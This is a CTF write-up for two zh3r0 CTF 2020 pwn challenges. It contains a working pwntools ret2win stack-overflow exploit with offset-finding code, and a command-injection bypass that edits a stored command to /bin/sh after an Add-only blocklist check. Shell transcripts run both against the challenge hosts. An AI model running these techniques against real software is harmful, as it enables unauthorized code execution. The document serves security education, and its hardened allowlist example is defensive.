zh3r0 CTF 2020【Write up】
Free Flag
```
$ file chall
chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=518d3397ca0a0d5e98e900e3f2e2937de34e3554, not stripped
```

```
$ checksec.sh --file=./chall
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified Fortifiable FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   72 Symbols      No      0         1           ./chall
```
```
$ ./chall
Welcome to zh3r0 ctf. Please provide us your name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
```

A long name crashes the program, so there is a stack buffer overflow. checksec shows no stack canary and no PIE, so the saved return address can be overwritten with a fixed address.
```
gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x0000000000400598  _init
0x00000000004005c0  puts@plt
0x00000000004005d0  system@plt
0x00000000004005e0  alarm@plt
0x00000000004005f0  read@plt
0x0000000000400600  setvbuf@plt
0x0000000000400610  exit@plt
0x0000000000400620  _start
0x0000000000400650  _dl_relocate_static_pie
0x0000000000400660  deregister_tm_clones
0x0000000000400690  register_tm_clones
0x00000000004006d0  __do_global_dtors_aux
0x0000000000400700  frame_dummy
0x0000000000400707  win_win
0x000000000040071a  here
0x000000000040076e  init
0x00000000004007d9  main
0x0000000000400800  __libc_csu_init
0x0000000000400870  __libc_csu_fini
0x0000000000400874  _fini
gdb-peda$ pdisas win_win
Dump of assembler code for function win_win:
   0x0000000000400707 <+0>:     push   rbp
   0x0000000000400708 <+1>:     mov    rbp,rsp
   0x000000000040070b <+4>:     lea    rdi,[rip+0x172]        # 0x400884
   0x0000000000400712 <+11>:    call   0x4005d0 <system@plt>
   0x0000000000400717 <+16>:    nop
   0x0000000000400718 <+17>:    pop    rbp
   0x0000000000400719 <+18>:    ret
End of assembler dump.
gdb-peda$ x/s 0x400884
0x400884:       "cat flag.txt"
gdb-peda$
```

Looking at the binary in gdb, there is a function called win_win that is never reached normally; calling it runs system("cat flag.txt"). So this is a plain ret2win: overwrite the saved return address with the address of win_win.

The exploit code is below. The 40 bytes of padding reach the saved return address, and the extra `ret` gadget at 0x4005ae is placed before win_win so that rsp is 16-byte aligned when system() is reached (otherwise the movaps inside libc can fault).
```python
from pwn import *

e = ELF('./chall')
#p = process('./chall')
p = remote('us.pwn.zh3r0.ml', 3456)

flag = e.symbols['win_win']   # 0x400707; No PIE, so the address is fixed
ret_addr = 0x004005ae         # a lone `ret`: realigns the stack to 16 bytes before system()

payload = b'A' * 40           # padding up to the saved return address
payload += p64(ret_addr)      # return into `ret` first (stack alignment)
payload += p64(flag)          # then into win_win -> system("cat flag.txt")

print(p.recvuntil(b'name:'))
p.sendline(payload)
p.interactive()
```
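The write-up states the 40-byte offset without showing how it was found. The following is an added example, not code from the write-up, that walks through that step and the payload layout with only the standard library: it generates a cyclic (de Bruijn) pattern of the kind pwntools' `cyclic` produces, recovers the offset from the 8 bytes that landed in the saved-return-address slot, and packs the `ret` gadget and win_win addresses from the page. The crash itself is simulated with a constructed stack frame (`simulate_crash`, assuming a 32-byte buffer plus 8 bytes of saved rbp); against the real binary you would instead read that value from gdb at the fault (for example `x/gx $rsp`).

```python
import struct

# Addresses taken from the write-up's gdb output and exploit (No PIE, so they are fixed).
WIN_WIN = 0x400707      # win_win(): system("cat flag.txt")
RET_GADGET = 0x4005ae   # a lone `ret`, used to realign rsp to 16 bytes before system()


def p64(value):
    """Little-endian 8-byte pack, the same as pwntools' p64."""
    return struct.pack("<Q", value)


def de_bruijn(alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4, length=200):
    """Cyclic pattern in which every n-byte window is unique, so any n bytes
    recovered from a register or stack slot map back to exactly one offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if len(seq) >= length:
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])


def find_offset(pattern, leaked):
    """Offset in the pattern of the bytes that overwrote the saved return address.
    Four bytes are enough because every 4-byte window of the pattern is unique."""
    off = pattern.find(leaked[:4])
    if off < 0:
        raise ValueError("leaked bytes not found in pattern")
    return off


def simulate_crash(pattern, buf_size=32):
    """Constructed stand-in for the gdb step: a frame of buf_size bytes of buffer,
    8 bytes of saved rbp and 8 bytes of return address, filled by an unchecked
    read() of the pattern. Returns the 8 bytes now sitting in the return slot."""
    frame = bytearray(buf_size + 8 + 8)
    n = min(len(pattern), len(frame))
    frame[:n] = pattern[:n]
    return bytes(frame[buf_size + 8:buf_size + 16])


def build_payload(offset):
    """Padding to the return address, then `ret` for alignment, then win_win."""
    return b"A" * offset + p64(RET_GADGET) + p64(WIN_WIN)


if __name__ == "__main__":
    pattern = de_bruijn()
    leaked = simulate_crash(pattern)
    offset = find_offset(pattern, leaked)
    print("offset to saved return address:", offset)
    print("payload:", build_payload(offset).hex())
```

With the real target the only change is where `leaked` comes from: send `de_bruijn()` as the name under gdb, read the value in the return-address slot at the crash, and feed it to `find_offset`.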
```
$ python solve.py
[*] '/path/to/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to us.pwn.zh3r0.ml on port 3456: Done
Welcome to zh3r0 ctf. Please provide us your name:
[*] Switching to interactive mode
zh3r0{welcome_to_zh3r0_ctf}
[*] Got EOF while reading in interactive
$
[*] Closed connection to us.pwn.zh3r0.ml port 3456
[*] Got EOF while sending in interactive
```
Command-1
```
$ file command_1
command_1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a90b629e4472aa6f35d5749a3bf1cab50f8bdb5a, not stripped
```

```
$ checksec.sh --file=command_1
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified Fortifiable FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   86 Symbols      Yes     0         4           command_1
```

```
$ ./command_1
Please enter your name: AAAA
Hello AAAA
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 1
Enter the command you want to add.
> /bin/sh
I don't see where you are going you idiot
```
Entering "/bin/sh" through 1.) Add command is rejected, as expected. However, the filter is only applied on Add: if you add an arbitrary string first and then change it with 3.) Edit command, you can store any command you like and run it with 2.) Run command. That is all there is to it (the flag shows the intended solution was a heap overflow rewriting a next pointer to a fake chunk in the .bss name buffer, but the missing check on the edit path makes that unnecessary).
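The bug is that the blocklist check sits on one write path (Add) and not the other (Edit), while Run trusts whatever is stored. The following is an added example, not code from the challenge binary (whose source is not on the page): a Python model of the menu that reproduces the bypass, beside a hardened version that validates at a single chokepoint on every write path and again at the point of use, with an allowlist instead of a blocklist and argv execution instead of a shell. `BLOCKLIST`, `ALLOWED` and the class names are constructed for the example.

```python
import shlex
import subprocess

# Constructed stand-in for the binary's unknown blocklist.
BLOCKLIST = ("/bin/sh", "sh", "bash")


class LeakyCommandStore:
    """Models the behaviour seen in command_1: the check runs only on Add."""

    def __init__(self):
        self.commands = []

    def add(self, cmd):
        if any(bad in cmd for bad in BLOCKLIST):
            raise ValueError("I don't see where you are going you idiot")
        self.commands.append(cmd)
        return len(self.commands) - 1

    def edit(self, index, cmd):
        self.commands[index] = cmd   # no check on this path: the bypass

    def run(self, index):
        # Returns the string that would be handed to system(); not executed here.
        return self.commands[index]


# Allowlist of permitted programs for the hardened version (constructed).
ALLOWED = {"ls", "date", "whoami"}


class HardenedCommandStore:
    """Validate with one function on every write path and again at point of use."""

    def __init__(self):
        self.commands = []

    @staticmethod
    def _validate(cmd):
        # Tokenise without a shell and allow only a known argv[0].
        argv = shlex.split(cmd)
        if not argv or argv[0] not in ALLOWED:
            raise ValueError("command not allowed: %r" % cmd)
        return argv

    def add(self, cmd):
        self._validate(cmd)
        self.commands.append(cmd)
        return len(self.commands) - 1

    def edit(self, index, cmd):
        self._validate(cmd)          # same chokepoint as add()
        self.commands[index] = cmd

    def run(self, index, execute=False):
        # Re-check at the point of use, so a stale or tampered entry cannot run.
        argv = self._validate(self.commands[index])
        if execute:
            subprocess.run(argv, check=False)   # argv list, shell=False: no shell parsing
        return argv


if __name__ == "__main__":
    leaky = LeakyCommandStore()
    i = leaky.add("ls")
    leaky.edit(i, "/bin/sh")
    print("leaky store would run:", leaky.run(i))

    safe = HardenedCommandStore()
    i = safe.add("ls -la")
    try:
        safe.edit(i, "/bin/sh")
    except ValueError as exc:
        print("hardened store rejected edit:", exc)
    print("hardened store would run:", safe.run(i))
```

The point is not the particular blocklist: any validation that is attached to one entry point rather than to the stored value itself can be bypassed by whichever path forgot it, so the check belongs where the value is written and, ideally, again where it is used.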
```
$ ./command_1
Please enter your name: 1
Hello 1
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 1
Enter the command you want to add.
> AAA
Command added at index [0] .
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 3
Enter index you want to edit: 0
Enter new command -> /bin/sh
Command edited.
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 2
So you want to run the command:
Enter the index of the command: ls
$ id
```

The same steps against the remote service:

```
$ nc us.pwn.zh3r0.ml 8520
Please enter your name: tekashi
Hello tekashi
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 1
Enter the command you want to add.
> ls
Command added at index [0] .
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 3
Enter index you want to edit: 0
Enter new command -> cat "flag.txt"
Command edited.
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
> 2
So you want to run the command:
Enter the index of the command: 0
zh3r0{the_intended_sol_useoverflow_change_nextpointer_toFakechunk_in_bssname}
-------------------
1.) Add command.
2.) Run command.
3.) Edit command.
4.) Exit.
```